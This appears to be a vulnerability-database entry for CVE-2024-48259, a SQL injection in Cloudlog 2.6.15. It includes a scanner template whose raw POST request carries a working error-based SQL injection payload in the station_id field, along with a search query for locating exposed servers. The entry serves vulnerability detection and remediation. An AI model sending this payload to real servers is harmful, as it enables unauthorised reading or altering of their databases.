Cloudlog - SQL Injection

CVE-2024-48259
Verified

Description

Cloudlog 2.6.15 contains a SQL injection vulnerability caused by unsanitized input in the request_form function of oqrs.php. An attacker can execute arbitrary SQL commands via the station_id or callsign parameters; exploitation requires sending a crafted request.

Severity

High

CVSS Score

7.3

Exploit Probability

5%

Affected Product

cloudlog

Published Date

May 11, 2026

Template Author

s4e-io

CVE-2024-48259.yaml
id: CVE-2024-48259

info:
  name: Cloudlog - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Cloudlog 2.6.15 contains a SQL injection caused by unsanitized input in oqrs.php request_form, letting attackers execute arbitrary SQL commands via station_id or callsign, exploit requires sending crafted request.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.
  reference:
    - https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
    - https://github.com/magicbug/Cloudlog
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48259
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2024-48259
    epss-score: 0.04818
    epss-percentile: 0.89783
    cwe-id: CWE-89
    cpe: cpe:2.3:a:magicbug:cloudlog:2.6.15:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magicbug
    product: cloudlog
    fofa-query: "Login - Cloudlog"
  tags: cve,cve2024,cloudlog,sqli,vuln,unauth

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/oqrs/request_form HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,md5({{num}}),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "A Database Error Occurred", "{{md5({{num}})}}")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a0047304502207da8f485959c479dfa5e070e3a80cfd0b6e1ab59e5958b869b4c9fe0aeba44cb022100dc0059d8af1f8045d6321d69887bec48b4d86fb7791e65a981434d97eda48224:922c64590222798bb761d5b6d8e72950
Score: 7.3

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID: CVE-2024-48259
CWE ID: CWE-89

References

https://chiggerlor.substack.com/p/unauthenticated-sql-injection-in-9a3
https://github.com/magicbug/Cloudlog
https://nvd.nist.gov/vuln/detail/CVE-2024-48259

Remediation Steps

Update to the latest version of Cloudlog where this issue is fixed, or sanitize inputs properly.